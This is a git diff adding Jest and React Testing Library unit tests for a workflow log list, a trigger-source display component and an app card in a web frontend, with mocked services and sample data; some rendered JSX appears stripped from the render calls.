expect(screen.getByText('appLog.table.header.tokens')).toBeInTheDocument() + expect(screen.getByText('appLog.table.header.user')).toBeInTheDocument() + }) + + it('should render trigger column for workflow apps', () => { + const logs = createMockLogsResponse([createMockWorkflowLog()]) + const workflowApp = createMockApp({ mode: 'workflow' as AppModeEnum }) + + render( + , + ) + + expect(screen.getByText('appLog.table.header.triggered_from')).toBeInTheDocument() + }) + + it('should not render trigger column for non-workflow apps', () => { + const logs = createMockLogsResponse([createMockWorkflowLog()]) + const chatApp = createMockApp({ mode: 'advanced-chat' as AppModeEnum }) + + render( + , + ) + + expect(screen.queryByText('appLog.table.header.triggered_from')).not.toBeInTheDocument() + }) + }) + + // -------------------------------------------------------------------------- + // Status Display Tests + // -------------------------------------------------------------------------- + describe('Status Display', () => { + it('should render success status correctly', () => { + const logs = createMockLogsResponse([ + createMockWorkflowLog({ + workflow_run: createMockWorkflowRun({ status: 'succeeded' }), + }), + ]) + + render( + , + ) + + expect(screen.getByText('Success')).toBeInTheDocument() + }) + + it('should render failure status correctly', () => { + const logs = createMockLogsResponse([ + createMockWorkflowLog({ + workflow_run: createMockWorkflowRun({ status: 'failed' }), + }), + ]) + + render( + , + ) + + expect(screen.getByText('Failure')).toBeInTheDocument() + }) + + it('should render stopped status correctly', () => { + const logs = createMockLogsResponse([ + createMockWorkflowLog({ + workflow_run: createMockWorkflowRun({ status: 'stopped' }), + }), + ]) + + render( + , + ) + + expect(screen.getByText('Stop')).toBeInTheDocument() + }) + + it('should render running status correctly', () => { + const logs = createMockLogsResponse([ + createMockWorkflowLog({ + workflow_run: createMockWorkflowRun({ status: 'running' }), + }), + ]) + + render( + , + ) + + expect(screen.getByText('Running')).toBeInTheDocument() + }) + + it('should render partial-succeeded status correctly', () => { + const logs = createMockLogsResponse([ + createMockWorkflowLog({ + workflow_run: createMockWorkflowRun({ status: 'partial-succeeded' as WorkflowRunDetail['status'] }), + }), + ]) + + render( + , + ) + + expect(screen.getByText('Partial Success')).toBeInTheDocument() + }) + }) + + // -------------------------------------------------------------------------- + // User Info Display Tests + // -------------------------------------------------------------------------- + describe('User Info Display', () => { + it('should display account name when created by account', () => { + const logs = createMockLogsResponse([ + createMockWorkflowLog({ + created_by_account: { id: 'acc-1', name: 'John Doe', email: 'john@example.com' }, + created_by_end_user: undefined, + }), + ]) + + render( + , + ) + + expect(screen.getByText('John Doe')).toBeInTheDocument() + }) + + it('should display end user session id when created by end user', () => { + const logs = createMockLogsResponse([ + createMockWorkflowLog({ + created_by_end_user: { id: 'user-1', type: 'browser', is_anonymous: false, session_id: 'session-abc-123' }, + created_by_account: undefined, + }), + ]) + + render( + , + ) + + expect(screen.getByText('session-abc-123')).toBeInTheDocument() + }) + + it('should display N/A when no user info', () => { + const logs = createMockLogsResponse([ + createMockWorkflowLog({ + created_by_account: undefined, + created_by_end_user: undefined, + }), + ]) + + render( + , + ) + + expect(screen.getByText('N/A')).toBeInTheDocument() + }) + }) + + // -------------------------------------------------------------------------- + // Sorting Tests + // -------------------------------------------------------------------------- + describe('Sorting', () => { + it('should sort logs in descending order by default', () => { + const logs = createMockLogsResponse([ + createMockWorkflowLog({ id: 'log-1', created_at: 1000 }), + createMockWorkflowLog({ id: 'log-2', created_at: 2000 }), + createMockWorkflowLog({ id: 'log-3', created_at: 3000 }), + ]) + + render( + , + ) + + const rows = screen.getAllByRole('row') + // First row is header, data rows start from index 1 + // In descending order, newest (3000) should be first + expect(rows.length).toBe(4) // 1 header + 3 data rows + }) + + it('should toggle sort order when clicking on start time header', async () => { + const user = userEvent.setup() + const logs = createMockLogsResponse([ + createMockWorkflowLog({ id: 'log-1', created_at: 1000 }), + createMockWorkflowLog({ id: 'log-2', created_at: 2000 }), + ]) + + render( + , + ) + + // Click on the start time header to toggle sort + const startTimeHeader = screen.getByText('appLog.table.header.startTime') + await user.click(startTimeHeader) + + // Arrow should rotate (indicated by class change) + // The sort icon should have rotate-180 class for ascending + const sortIcon = startTimeHeader.closest('div')?.querySelector('svg') + expect(sortIcon).toBeInTheDocument() + }) + + it('should render sort arrow icon', () => { + const logs = createMockLogsResponse([createMockWorkflowLog()]) + + const { container } = render( + , + ) + + // Check for ArrowDownIcon presence + const sortArrow = container.querySelector('svg.ml-0\\.5') + expect(sortArrow).toBeInTheDocument() + }) + }) + + // -------------------------------------------------------------------------- + // Drawer Tests + // -------------------------------------------------------------------------- + describe('Drawer', () => { + it('should open drawer when clicking on a log row', async () => { + const user = userEvent.setup() + useAppStore.setState({ appDetail: createMockApp({ id: 'app-123' }) }) + const logs = createMockLogsResponse([ + createMockWorkflowLog({ + id: 'log-1', + workflow_run: createMockWorkflowRun({ id: 'run-456' }), + }), + ]) + + render( + , + ) + + const dataRows = screen.getAllByRole('row') + await user.click(dataRows[1]) // Click first data row + + const dialog = await screen.findByRole('dialog') + expect(dialog).toBeInTheDocument() + expect(screen.getByText('appLog.runDetail.workflowTitle')).toBeInTheDocument() + }) + + it('should close drawer and call onRefresh when closing', async () => { + const user = userEvent.setup() + const onRefresh = jest.fn() + useAppStore.setState({ appDetail: createMockApp() }) + const logs = createMockLogsResponse([createMockWorkflowLog()]) + + render( + , + ) + + // Open drawer + const dataRows = screen.getAllByRole('row') + await user.click(dataRows[1]) + await screen.findByRole('dialog') + + // Close drawer using Escape key + await user.keyboard('{Escape}') + + await waitFor(() => { + expect(onRefresh).toHaveBeenCalled() + expect(screen.queryByRole('dialog')).not.toBeInTheDocument() + }) + }) + + it('should highlight selected row', async () => { + const user = userEvent.setup() + const logs = createMockLogsResponse([createMockWorkflowLog()]) + + render( + , + ) + + const dataRows = screen.getAllByRole('row') + const dataRow = dataRows[1] + + // Before click - no highlight + expect(dataRow).not.toHaveClass('bg-background-default-hover') + + // After click - has highlight (via currentLog state) + await user.click(dataRow) + + // The row should have the selected class + expect(dataRow).toHaveClass('bg-background-default-hover') + }) + }) + + // -------------------------------------------------------------------------- + // Replay Functionality Tests + // -------------------------------------------------------------------------- + describe('Replay Functionality', () => { + it('should allow replay when triggered from app-run', async () => { + const user = userEvent.setup() + useAppStore.setState({ appDetail: createMockApp({ id: 'app-replay' }) }) + const logs = createMockLogsResponse([ + createMockWorkflowLog({ + workflow_run: createMockWorkflowRun({ + id: 'run-to-replay', + triggered_from: WorkflowRunTriggeredFrom.APP_RUN, + }), + }), + ]) + + render( + , + ) + + // Open drawer + const dataRows = screen.getAllByRole('row') + await user.click(dataRows[1]) + await screen.findByRole('dialog') + + // Replay button should be present for app-run triggers + const replayButton = screen.getByRole('button', { name: 'appLog.runDetail.testWithParams' }) + await user.click(replayButton) + + expect(mockRouterPush).toHaveBeenCalledWith('/app/app-replay/workflow?replayRunId=run-to-replay') + }) + + it('should allow replay when triggered from debugging', async () => { + const user = userEvent.setup() + useAppStore.setState({ appDetail: createMockApp({ id: 'app-debug' }) }) + const logs = createMockLogsResponse([ + createMockWorkflowLog({ + workflow_run: createMockWorkflowRun({ + id: 'debug-run', + triggered_from: WorkflowRunTriggeredFrom.DEBUGGING, + }), + }), + ]) + + render( + , + ) + + // Open drawer + const dataRows = screen.getAllByRole('row') + await user.click(dataRows[1]) + await screen.findByRole('dialog') + + // Replay button should be present for debugging triggers + const replayButton = screen.getByRole('button', { name: 'appLog.runDetail.testWithParams' }) + expect(replayButton).toBeInTheDocument() + }) + + it('should not show replay for webhook triggers', async () => { + const user = userEvent.setup() + useAppStore.setState({ appDetail: createMockApp({ id: 'app-webhook' }) }) + const logs = createMockLogsResponse([ + createMockWorkflowLog({ + workflow_run: createMockWorkflowRun({ + id: 'webhook-run', + triggered_from: WorkflowRunTriggeredFrom.WEBHOOK, + }), + }), + ]) + + render( + , + ) + + // Open drawer + const dataRows = screen.getAllByRole('row') + await user.click(dataRows[1]) + await screen.findByRole('dialog') + + // Replay button should not be present for webhook triggers + expect(screen.queryByRole('button', { name: 'appLog.runDetail.testWithParams' })).not.toBeInTheDocument() + }) + }) + + // -------------------------------------------------------------------------- + // Unread Indicator Tests + // -------------------------------------------------------------------------- + describe('Unread Indicator', () => { + it('should show unread indicator for unread logs', () => { + const logs = createMockLogsResponse([ + createMockWorkflowLog({ + read_at: undefined, + }), + ]) + + const { container } = render( + , + ) + + // Unread indicator is a small blue dot + const unreadDot = container.querySelector('.bg-util-colors-blue-blue-500') + expect(unreadDot).toBeInTheDocument() + }) + + it('should not show unread indicator for read logs', () => { + const logs = createMockLogsResponse([ + createMockWorkflowLog({ + read_at: Date.now(), + }), + ]) + + const { container } = render( + , + ) + + // No unread indicator + const unreadDot = container.querySelector('.bg-util-colors-blue-blue-500') + expect(unreadDot).not.toBeInTheDocument() + }) + }) + + // -------------------------------------------------------------------------- + // Runtime Display Tests + // -------------------------------------------------------------------------- + describe('Runtime Display', () => { + it('should display elapsed time with 3 decimal places', () => { + const logs = createMockLogsResponse([ + createMockWorkflowLog({ + workflow_run: createMockWorkflowRun({ elapsed_time: 1.23456 }), + }), + ]) + + render( + , + ) + + expect(screen.getByText('1.235s')).toBeInTheDocument() + }) + + it('should display 0 elapsed time with special styling', () => { + const logs = createMockLogsResponse([ + createMockWorkflowLog({ + workflow_run: createMockWorkflowRun({ elapsed_time: 0 }), + }), + ]) + + render( + , + ) + + const zeroTime = screen.getByText('0.000s') + expect(zeroTime).toBeInTheDocument() + expect(zeroTime).toHaveClass('text-text-quaternary') + }) + }) + + // -------------------------------------------------------------------------- + // Token Display Tests + // -------------------------------------------------------------------------- + describe('Token Display', () => { + it('should display total tokens', () => { + const logs = createMockLogsResponse([ + createMockWorkflowLog({ + workflow_run: createMockWorkflowRun({ total_tokens: 12345 }), + }), + ]) + + render( + , + ) + + expect(screen.getByText('12345')).toBeInTheDocument() + }) + }) + + // -------------------------------------------------------------------------- + // Empty State Tests + // -------------------------------------------------------------------------- + describe('Empty State', () => { + it('should render empty table when logs data is empty', () => { + const logs = createMockLogsResponse([]) + + render( + , + ) + + const table = screen.getByRole('table') + expect(table).toBeInTheDocument() + + // Should only have header row + const rows = screen.getAllByRole('row') + expect(rows).toHaveLength(1) + }) + }) + + // -------------------------------------------------------------------------- + // Edge Cases (REQUIRED) + // -------------------------------------------------------------------------- + describe('Edge Cases', () => { + it('should handle multiple logs correctly', () => { + const logs = createMockLogsResponse([ + createMockWorkflowLog({ id: 'log-1', created_at: 1000 }), + createMockWorkflowLog({ id: 'log-2', created_at: 2000 }), + createMockWorkflowLog({ id: 'log-3', created_at: 3000 }), + ]) + + render( + , + ) + + const rows = screen.getAllByRole('row') + expect(rows).toHaveLength(4) // 1 header + 3 data rows + }) + + it('should handle logs with missing workflow_run data gracefully', () => { + const logs = createMockLogsResponse([ + createMockWorkflowLog({ + workflow_run: createMockWorkflowRun({ + elapsed_time: 0, + total_tokens: 0, + }), + }), + ]) + + render( + , + ) + + expect(screen.getByText('0.000s')).toBeInTheDocument() + expect(screen.getByText('0')).toBeInTheDocument() + }) + + it('should handle null workflow_run.triggered_from for non-workflow apps', () => { + const logs = createMockLogsResponse([ + createMockWorkflowLog({ + workflow_run: createMockWorkflowRun({ + triggered_from: undefined as any, + }), + }), + ]) + const chatApp = createMockApp({ mode: 'advanced-chat' as AppModeEnum }) + + render( + , + ) + + // Should render without trigger column + expect(screen.queryByText('appLog.table.header.triggered_from')).not.toBeInTheDocument() + }) + }) +}) diff --git a/web/app/components/app/workflow-log/list.tsx b/web/app/components/app/workflow-log/list.tsx index 0e9b5dd67f..cef8a98f44 100644 --- a/web/app/components/app/workflow-log/list.tsx +++ b/web/app/components/app/workflow-log/list.tsx @@ -12,7 +12,7 @@ import Drawer from '@/app/components/base/drawer' import Indicator from '@/app/components/header/indicator' import useBreakpoints, { MediaType } from '@/hooks/use-breakpoints' import useTimestamp from '@/hooks/use-timestamp' -import cn from '@/utils/classnames' +import { cn } from '@/utils/classnames' import type { WorkflowRunTriggeredFrom } from '@/models/log' type ILogs = { diff --git a/web/app/components/app/workflow-log/trigger-by-display.spec.tsx b/web/app/components/app/workflow-log/trigger-by-display.spec.tsx new file mode 100644 index 0000000000..6e95fc2f35 --- /dev/null +++ b/web/app/components/app/workflow-log/trigger-by-display.spec.tsx @@ -0,0 +1,371 @@ +/** + * TriggerByDisplay Component Tests + * + * Tests the display of workflow trigger sources with appropriate icons and labels. + * Covers all trigger types: app-run, debugging, webhook, schedule, plugin, rag-pipeline. + */ + +import { render, screen } from '@testing-library/react' +import TriggerByDisplay from './trigger-by-display' +import { WorkflowRunTriggeredFrom } from '@/models/log' +import type { TriggerMetadata } from '@/models/log' +import { Theme } from '@/types/app' + +// ============================================================================ +// Mocks +// ============================================================================ + +let mockTheme = Theme.light +jest.mock('@/hooks/use-theme', () => ({ + __esModule: true, + default: () => ({ theme: mockTheme }), +})) + +// Mock BlockIcon as it has complex dependencies +jest.mock('@/app/components/workflow/block-icon', () => ({ + __esModule: true, + default: ({ type, toolIcon }: { type: string; toolIcon?: string }) => ( +
    + BlockIcon +
    + ), +})) + +// ============================================================================ +// Test Data Factories +// ============================================================================ + +const createTriggerMetadata = (overrides: Partial = {}): TriggerMetadata => ({ + ...overrides, +}) + +// ============================================================================ +// Tests +// ============================================================================ + +describe('TriggerByDisplay', () => { + beforeEach(() => { + jest.clearAllMocks() + mockTheme = Theme.light + }) + + // -------------------------------------------------------------------------- + // Rendering Tests (REQUIRED) + // -------------------------------------------------------------------------- + describe('Rendering', () => { + it('should render without crashing', () => { + render() + + expect(screen.getByText('appLog.triggerBy.appRun')).toBeInTheDocument() + }) + + it('should render icon container', () => { + const { container } = render( + , + ) + + // Should have icon container with flex layout + const iconContainer = container.querySelector('.flex.items-center.justify-center') + expect(iconContainer).toBeInTheDocument() + }) + }) + + // -------------------------------------------------------------------------- + // Props Tests (REQUIRED) + // -------------------------------------------------------------------------- + describe('Props', () => { + it('should apply custom className', () => { + const { container } = render( + , + ) + + const wrapper = container.firstChild as HTMLElement + expect(wrapper).toHaveClass('custom-class') + }) + + it('should show text by default (showText defaults to true)', () => { + render() + + expect(screen.getByText('appLog.triggerBy.appRun')).toBeInTheDocument() + }) + + it('should hide text when showText is false', () => { + render( + , + ) + + expect(screen.queryByText('appLog.triggerBy.appRun')).not.toBeInTheDocument() + }) + }) + + // -------------------------------------------------------------------------- + // Trigger Type Display Tests + // -------------------------------------------------------------------------- + describe('Trigger Types', () => { + it('should display app-run trigger correctly', () => { + render() + + expect(screen.getByText('appLog.triggerBy.appRun')).toBeInTheDocument() + }) + + it('should display debugging trigger correctly', () => { + render() + + expect(screen.getByText('appLog.triggerBy.debugging')).toBeInTheDocument() + }) + + it('should display webhook trigger correctly', () => { + render() + + expect(screen.getByText('appLog.triggerBy.webhook')).toBeInTheDocument() + }) + + it('should display schedule trigger correctly', () => { + render() + + expect(screen.getByText('appLog.triggerBy.schedule')).toBeInTheDocument() + }) + + it('should display plugin trigger correctly', () => { + render() + + expect(screen.getByText('appLog.triggerBy.plugin')).toBeInTheDocument() + }) + + it('should display rag-pipeline-run trigger correctly', () => { + render() + + expect(screen.getByText('appLog.triggerBy.ragPipelineRun')).toBeInTheDocument() + }) + + it('should display rag-pipeline-debugging trigger correctly', () => { + render() + + expect(screen.getByText('appLog.triggerBy.ragPipelineDebugging')).toBeInTheDocument() + }) + }) + + // -------------------------------------------------------------------------- + // Plugin Metadata Tests + // -------------------------------------------------------------------------- + describe('Plugin Metadata', () => { + it('should display custom event name from plugin metadata', () => { + const metadata = createTriggerMetadata({ event_name: 'Custom Plugin Event' }) + + render( + , + ) + + expect(screen.getByText('Custom Plugin Event')).toBeInTheDocument() + }) + + it('should fallback to default plugin text when no event_name', () => { + const metadata = createTriggerMetadata({}) + + render( + , + ) + + expect(screen.getByText('appLog.triggerBy.plugin')).toBeInTheDocument() + }) + + it('should use plugin icon from metadata in light theme', () => { + mockTheme = Theme.light + const metadata = createTriggerMetadata({ icon: 'light-icon.png', icon_dark: 'dark-icon.png' }) + + render( + , + ) + + const blockIcon = screen.getByTestId('block-icon') + expect(blockIcon).toHaveAttribute('data-tool-icon', 'light-icon.png') + }) + + it('should use dark plugin icon in dark theme', () => { + mockTheme = Theme.dark + const metadata = createTriggerMetadata({ icon: 'light-icon.png', icon_dark: 'dark-icon.png' }) + + render( + , + ) + + const blockIcon = screen.getByTestId('block-icon') + expect(blockIcon).toHaveAttribute('data-tool-icon', 'dark-icon.png') + }) + + it('should fallback to light icon when dark icon not available in dark theme', () => { + mockTheme = Theme.dark + const metadata = createTriggerMetadata({ icon: 'light-icon.png' }) + + render( + , + ) + + const blockIcon = screen.getByTestId('block-icon') + expect(blockIcon).toHaveAttribute('data-tool-icon', 'light-icon.png') + }) + + it('should use default BlockIcon when plugin has no icon metadata', () => { + const metadata = createTriggerMetadata({}) + + render( + , + ) + + const blockIcon = screen.getByTestId('block-icon') + expect(blockIcon).toHaveAttribute('data-tool-icon', '') + }) + }) + + // -------------------------------------------------------------------------- + // Icon Rendering Tests + // -------------------------------------------------------------------------- + describe('Icon Rendering', () => { + it('should render WindowCursor icon for app-run trigger', () => { + const { container } = render( + , + ) + + // Check for the blue brand background used for app-run icon + const iconWrapper = container.querySelector('.bg-util-colors-blue-brand-blue-brand-500') + expect(iconWrapper).toBeInTheDocument() + }) + + it('should render Code icon for debugging trigger', () => { + const { container } = render( + , + ) + + // Check for the blue background used for debugging icon + const iconWrapper = container.querySelector('.bg-util-colors-blue-blue-500') + expect(iconWrapper).toBeInTheDocument() + }) + + it('should render WebhookLine icon for webhook trigger', () => { + const { container } = render( + , + ) + + // Check for the blue background used for webhook icon + const iconWrapper = container.querySelector('.bg-util-colors-blue-blue-500') + expect(iconWrapper).toBeInTheDocument() + }) + + it('should render Schedule icon for schedule trigger', () => { + const { container } = render( + , + ) + + // Check for the violet background used for schedule icon + const iconWrapper = container.querySelector('.bg-util-colors-violet-violet-500') + expect(iconWrapper).toBeInTheDocument() + }) + + it('should render KnowledgeRetrieval icon for rag-pipeline triggers', () => { + const { container } = render( + , + ) + + // Check for the green background used for rag pipeline icon + const iconWrapper = container.querySelector('.bg-util-colors-green-green-500') + expect(iconWrapper).toBeInTheDocument() + }) + }) + + // -------------------------------------------------------------------------- + // Edge Cases (REQUIRED) + // -------------------------------------------------------------------------- + describe('Edge Cases', () => { + it('should handle unknown trigger type gracefully', () => { + // Test with a type cast to simulate unknown trigger type + render() + + // Should fallback to default (app-run) icon styling + expect(screen.getByText('unknown-type')).toBeInTheDocument() + }) + + it('should handle undefined triggerMetadata', () => { + render( + , + ) + + expect(screen.getByText('appLog.triggerBy.plugin')).toBeInTheDocument() + }) + + it('should handle empty className', () => { + const { container } = render( + , + ) + + const wrapper = container.firstChild as HTMLElement + expect(wrapper).toHaveClass('flex', 'items-center', 'gap-1.5') + }) + + it('should render correctly when both showText is false and metadata is provided', () => { + const metadata = createTriggerMetadata({ event_name: 'Test Event' }) + + render( + , + ) + + // Text should not be visible even with metadata + expect(screen.queryByText('Test Event')).not.toBeInTheDocument() + expect(screen.queryByText('appLog.triggerBy.plugin')).not.toBeInTheDocument() + }) + }) + + // -------------------------------------------------------------------------- + // Theme Switching Tests + // -------------------------------------------------------------------------- + describe('Theme Switching', () => { + it('should render correctly in light theme', () => { + mockTheme = Theme.light + + render() + + expect(screen.getByText('appLog.triggerBy.appRun')).toBeInTheDocument() + }) + + it('should render correctly in dark theme', () => { + mockTheme = Theme.dark + + render() + + expect(screen.getByText('appLog.triggerBy.appRun')).toBeInTheDocument() + }) + }) +}) diff --git a/web/app/components/apps/app-card.spec.tsx b/web/app/components/apps/app-card.spec.tsx new file mode 100644 index 0000000000..f7ff525ed2 --- /dev/null +++ b/web/app/components/apps/app-card.spec.tsx @@ -0,0 +1,1387 @@ +import React from 'react' +import { fireEvent, render, screen, waitFor } from '@testing-library/react' +import { AppModeEnum } from '@/types/app' +import { AccessMode } from '@/models/access-control' + +// Mock next/navigation +const mockPush = jest.fn() +jest.mock('next/navigation', () => ({ + useRouter: () => ({ + push: mockPush, + }), +})) + +// Mock use-context-selector with stable mockNotify reference for tracking calls +// Include createContext for components that use it (like Toast) +const mockNotify = jest.fn() +jest.mock('use-context-selector', () => { + const React = require('react') + return { + createContext: (defaultValue: any) => React.createContext(defaultValue), + useContext: () => ({ + notify: mockNotify, + }), + useContextSelector: (_context: any, selector: any) => selector({ + notify: mockNotify, + }), + } +}) + +// Mock app context +jest.mock('@/context/app-context', () => ({ + useAppContext: () => ({ + isCurrentWorkspaceEditor: true, + }), +})) + +// Mock provider context +const mockOnPlanInfoChanged = jest.fn() +jest.mock('@/context/provider-context', () => ({ + useProviderContext: () => ({ + onPlanInfoChanged: mockOnPlanInfoChanged, + }), +})) + +// Mock global public store - allow dynamic configuration +let mockWebappAuthEnabled = false +jest.mock('@/context/global-public-context', () => ({ + useGlobalPublicStore: (selector: (s: any) => any) => selector({ + systemFeatures: { + webapp_auth: { enabled: mockWebappAuthEnabled }, + branding: { enabled: false }, + }, + }), +})) + +// Mock API services - import for direct manipulation +import * as appsService from '@/service/apps' +import * as workflowService from '@/service/workflow' + +jest.mock('@/service/apps', () => ({ + deleteApp: jest.fn(() => Promise.resolve()), + updateAppInfo: jest.fn(() => Promise.resolve()), + copyApp: jest.fn(() => Promise.resolve({ id: 'new-app-id' })), + exportAppConfig: jest.fn(() => Promise.resolve({ data: 'yaml: content' })), +})) + +jest.mock('@/service/workflow', () => ({ + fetchWorkflowDraft: jest.fn(() => Promise.resolve({ environment_variables: [] })), +})) + +jest.mock('@/service/explore', () => ({ + fetchInstalledAppList: jest.fn(() => Promise.resolve({ installed_apps: [{ id: 'installed-1' }] })), +})) + +jest.mock('@/service/access-control', () => ({ + useGetUserCanAccessApp: () => ({ + data: { result: true }, + isLoading: false, + }), +})) + +// Mock hooks +const mockOpenAsyncWindow = jest.fn() +jest.mock('@/hooks/use-async-window-open', () => ({ + useAsyncWindowOpen: () => mockOpenAsyncWindow, +})) + +// Mock utils +jest.mock('@/utils/app-redirection', () => ({ + getRedirection: jest.fn(), +})) + +jest.mock('@/utils/var', () => ({ + basePath: '', +})) + +jest.mock('@/utils/time', () => ({ + formatTime: () => 'Jan 1, 2024', +})) + +// Mock dynamic imports +jest.mock('next/dynamic', () => { + const React = require('react') + return (importFn: () => Promise) => { + const fnString = importFn.toString() + + if (fnString.includes('create-app-modal') || fnString.includes('explore/create-app-modal')) { + return function MockEditAppModal({ show, onHide, onConfirm }: any) { + if (!show) return null + return React.createElement('div', { 'data-testid': 'edit-app-modal' }, + React.createElement('button', { 'onClick': onHide, 'data-testid': 'close-edit-modal' }, 'Close'), + React.createElement('button', { + 'onClick': () => onConfirm?.({ + name: 'Updated App', + icon_type: 'emoji', + icon: '🎯', + icon_background: '#FFEAD5', + description: 'Updated description', + use_icon_as_answer_icon: false, + max_active_requests: null, + }), + 'data-testid': 'confirm-edit-modal', + }, 'Confirm'), + ) + } + } + if (fnString.includes('duplicate-modal')) { + return function MockDuplicateAppModal({ show, onHide, onConfirm }: any) { + if (!show) return null + return React.createElement('div', { 'data-testid': 'duplicate-modal' }, + React.createElement('button', { 'onClick': onHide, 'data-testid': 'close-duplicate-modal' }, 'Close'), + React.createElement('button', { + 'onClick': () => onConfirm?.({ + name: 'Copied App', + icon_type: 'emoji', + icon: '📋', + icon_background: '#E4FBCC', + }), + 'data-testid': 'confirm-duplicate-modal', + }, 'Confirm'), + ) + } + } + if (fnString.includes('switch-app-modal')) { + return function MockSwitchAppModal({ show, onClose, onSuccess }: any) { + if (!show) return null + return React.createElement('div', { 'data-testid': 'switch-modal' }, + React.createElement('button', { 'onClick': onClose, 'data-testid': 'close-switch-modal' }, 'Close'), + React.createElement('button', { 'onClick': onSuccess, 'data-testid': 'confirm-switch-modal' }, 'Switch'), + ) + } + } + if (fnString.includes('base/confirm')) { + return function MockConfirm({ isShow, onCancel, onConfirm }: any) { + if (!isShow) return null + return React.createElement('div', { 'data-testid': 'confirm-dialog' }, + React.createElement('button', { 'onClick': onCancel, 'data-testid': 'cancel-confirm' }, 'Cancel'), + React.createElement('button', { 'onClick': onConfirm, 'data-testid': 'confirm-confirm' }, 'Confirm'), + ) + } + } + if (fnString.includes('dsl-export-confirm-modal')) { + return function MockDSLExportModal({ onClose, onConfirm }: any) { + return React.createElement('div', { 'data-testid': 'dsl-export-modal' }, + React.createElement('button', { 'onClick': () => onClose?.(), 'data-testid': 'close-dsl-export' }, 'Close'), + React.createElement('button', { 'onClick': () => onConfirm?.(true), 'data-testid': 'confirm-dsl-export' }, 'Export with secrets'), + React.createElement('button', { 'onClick': () => onConfirm?.(false), 'data-testid': 'confirm-dsl-export-no-secrets' }, 'Export without secrets'), + ) + } + } + if (fnString.includes('app-access-control')) { + return function MockAccessControl({ onClose, onConfirm }: any) { + return React.createElement('div', { 'data-testid': 'access-control-modal' }, + React.createElement('button', { 'onClick': onClose, 'data-testid': 'close-access-control' }, 'Close'), + React.createElement('button', { 'onClick': onConfirm, 'data-testid': 'confirm-access-control' }, 'Confirm'), + ) + } + } + return () => null + } +}) + +// Popover uses @headlessui/react portals - mock for controlled interaction testing +jest.mock('@/app/components/base/popover', () => { + const MockPopover = ({ htmlContent, btnElement, btnClassName }: any) => { + const [isOpen, setIsOpen] = React.useState(false) + const computedClassName = typeof btnClassName === 'function' ? btnClassName(isOpen) : '' + return React.createElement('div', { 'data-testid': 'custom-popover', 'className': computedClassName }, + React.createElement('div', { + 'onClick': () => setIsOpen(!isOpen), + 'data-testid': 'popover-trigger', + }, btnElement), + isOpen && React.createElement('div', { + 'data-testid': 'popover-content', + 'onMouseLeave': () => setIsOpen(false), + }, + typeof htmlContent === 'function' ? htmlContent({ open: isOpen, onClose: () => setIsOpen(false), onClick: () => setIsOpen(false) }) : htmlContent, + ), + ) + } + return { __esModule: true, default: MockPopover } +}) + +// Tooltip uses portals - minimal mock preserving popup content as title attribute +jest.mock('@/app/components/base/tooltip', () => ({ + __esModule: true, + default: ({ children, popupContent }: any) => React.createElement('div', { title: popupContent }, children), +})) + +// TagSelector has API dependency (service/tag) - mock for isolated testing +jest.mock('@/app/components/base/tag-management/selector', () => ({ + __esModule: true, + default: ({ tags }: any) => { + const React = require('react') + return React.createElement('div', { 'aria-label': 'tag-selector' }, + tags?.map((tag: any) => React.createElement('span', { key: tag.id }, tag.name)), + ) + }, +})) + +// AppTypeIcon has complex icon mapping - mock for focused component testing +jest.mock('@/app/components/app/type-selector', () => ({ + AppTypeIcon: () => React.createElement('div', { 'data-testid': 'app-type-icon' }), +})) + +// Import component after mocks +import AppCard from './app-card' + +// ============================================================================ +// Test Data Factories +// ============================================================================ + +const createMockApp = (overrides: Record = {}) => ({ + id: 'test-app-id', + name: 'Test App', + description: 'Test app description', + mode: AppModeEnum.CHAT, + icon: '🤖', + icon_type: 'emoji' as const, + icon_background: '#FFEAD5', + icon_url: null, + author_name: 'Test Author', + created_at: 1704067200, + updated_at: 1704153600, + tags: [], + use_icon_as_answer_icon: false, + max_active_requests: null, + access_mode: AccessMode.PUBLIC, + has_draft_trigger: false, + enable_site: true, + enable_api: true, + api_rpm: 60, + api_rph: 3600, + is_demo: false, + model_config: {} as any, + app_model_config: {} as any, + site: {} as any, + api_base_url: 'https://api.example.com', + ...overrides, +}) + +// ============================================================================ +// Tests +// ============================================================================ + +describe('AppCard', () => { + const mockApp = createMockApp() + const mockOnRefresh = jest.fn() + + beforeEach(() => { + jest.clearAllMocks() + mockOpenAsyncWindow.mockReset() + mockWebappAuthEnabled = false + }) + + describe('Rendering', () => { + it('should render without crashing', () => { + render() + // Use title attribute to target specific element + expect(screen.getByTitle('Test App')).toBeInTheDocument() + }) + + it('should display app name', () => { + render() + expect(screen.getByTitle('Test App')).toBeInTheDocument() + }) + + it('should display app description', () => { + render() + expect(screen.getByTitle('Test app description')).toBeInTheDocument() + }) + + it('should display author name', () => { + render() + expect(screen.getByTitle('Test Author')).toBeInTheDocument() + }) + + it('should render app icon', () => { + // AppIcon component renders the emoji icon from app data + const { container } = render() + // Check that the icon container is rendered (AppIcon renders within the card) + const iconElement = container.querySelector('[class*="icon"]') || container.querySelector('img') + expect(iconElement || screen.getByText(mockApp.icon)).toBeTruthy() + }) + + it('should render app type icon', () => { + render() + expect(screen.getByTestId('app-type-icon')).toBeInTheDocument() + }) + + it('should display formatted edit time', () => { + render() + expect(screen.getByText(/edited/i)).toBeInTheDocument() + }) + }) + + describe('Props', () => { + it('should handle different app modes', () => { + const workflowApp = { ...mockApp, mode: AppModeEnum.WORKFLOW } + render() + expect(screen.getByTitle('Test App')).toBeInTheDocument() + }) + + it('should handle app with tags', () => { + const appWithTags = { + ...mockApp, + tags: [{ id: 'tag1', name: 'Tag 1', type: 'app', binding_count: 0 }], + } + render() + // Verify the tag selector component renders + expect(screen.getByLabelText('tag-selector')).toBeInTheDocument() + }) + + it('should render with onRefresh callback', () => { + render() + expect(screen.getByTitle('Test App')).toBeInTheDocument() + }) + }) + + describe('Access Mode Icons', () => { + it('should show public icon for public access mode', () => { + const publicApp = { ...mockApp, access_mode: AccessMode.PUBLIC } + const { container } = render() + const tooltip = container.querySelector('[title="app.accessItemsDescription.anyone"]') + expect(tooltip).toBeInTheDocument() + }) + + it('should show lock icon for specific groups access mode', () => { + const specificApp = { ...mockApp, access_mode: AccessMode.SPECIFIC_GROUPS_MEMBERS } + const { container } = render() + const tooltip = container.querySelector('[title="app.accessItemsDescription.specific"]') + expect(tooltip).toBeInTheDocument() + }) + + it('should show organization icon for organization access mode', () => { + const orgApp = { ...mockApp, access_mode: AccessMode.ORGANIZATION } + const { container } = render() + const tooltip = container.querySelector('[title="app.accessItemsDescription.organization"]') + expect(tooltip).toBeInTheDocument() + }) + + it('should show external icon for external access mode', () => { + const externalApp = { ...mockApp, access_mode: 